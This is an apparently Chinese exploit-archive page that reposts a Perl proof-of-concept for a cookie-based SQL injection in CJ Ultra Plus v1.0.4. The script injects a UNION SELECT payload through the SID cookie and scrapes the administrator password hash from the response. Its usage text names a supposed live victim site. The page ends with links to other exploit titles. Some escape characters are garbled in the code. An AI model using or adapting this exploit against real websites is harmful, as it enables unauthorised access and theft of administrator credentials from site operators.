手机
当前位置:查字典教程网 >网络安全 >Exploit >CJ Ultra Plus
CJ Ultra Plus
摘要:#!/usr/bin/perl##CJUltraPlus>>GretzZz2:pronoobz.org-Wesker,ChinaSunand...

#!/usr/bin/perl

#

# CJ Ultra Plus <= v1.0.4 Cookie SQL Injection

#

# found and coded by -SmoG- /GermAn hAckZ0r

# contact: ICQ - 266836394

#

#

#

#

# hints: - sometimes the parameter "SID" is different to the normal one...

# - i extract the hash from the html-code... but i was 2 lazy for coding a good working filter

# - salted DES (normaly "aa" will be the salt, but it can be different)

# - ive spend about 1 hour for this source... its my first exploit in perl... so plz be friendly with ur feedback...

#

#

# >>> GretzZz 2: pronoobz.org - Wesker, China Sun and all other memberZz <<<

use LWP::UserAgent;

if ($#ARGV 1 !=1) {

print "n### CJ Ultra Plus <= v1.0.4 Cookie SQL Injection Exploit###n";

print "found and coded by -SmoG-n";

print "nnUsage: perl xploit.pl -victimn";

print " perl xploit.pl http://gayxboy.com/nn"; #LiVe-Dem0! letZz pwnz the pedophile!!

exit();

}

print "n### CJ Ultra Plus <= v1.0.4 Cookie SQL Injection Exploit###n";

print "nstarting exploit...";

$target=$ARGV[0];

chomp($target);

if($target !~ /^http:///)

{

$target = "http://".$target;

}

if($target !~ //$/)

{

$target .= "/";

}

@header = ('Cookie' => "SID='UNION SELECT b12 from settings/*");

$ua = LWP::UserAgent->new;

$ua->timeout(10);

$ua->env_proxy;

$ua->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12");

$response = $ua->get($target, @header);

if ($response->is_success)

{

$temp = $response->content;

if ($temp =~/(.*)SID=(.*);/)

{

$result=substr($temp,85,13);

print "nadminhash: "; print $result;

}

}

else

{

die "Error: ".$response->status_line;

}

【CJ Ultra Plus】相关文章:

BoonEx Ray 3.5 (sIncPath) Remote File Inclusion Vulnerability

Mole Group Real Estate Script

Xerox Phaser 8400 (reboot) Remote Denial of Service Exploit

Friendly Technologies (fwRemoteCfg.dll) ActiveX Remote BOF Exploit

WFTPD Pro Server

Maian Search

jSite 1.0 OE (SQL/LFI) Multiple Remote Vulnerabilities

ESET Smart Security 3.0.667.0 Privilege Escalation PoC

MS Internet Explorer Recordset Double Free Memory Exploit

MS Internet Explorer (FTP Server Response) DoS Exploit

精品推荐
分类导航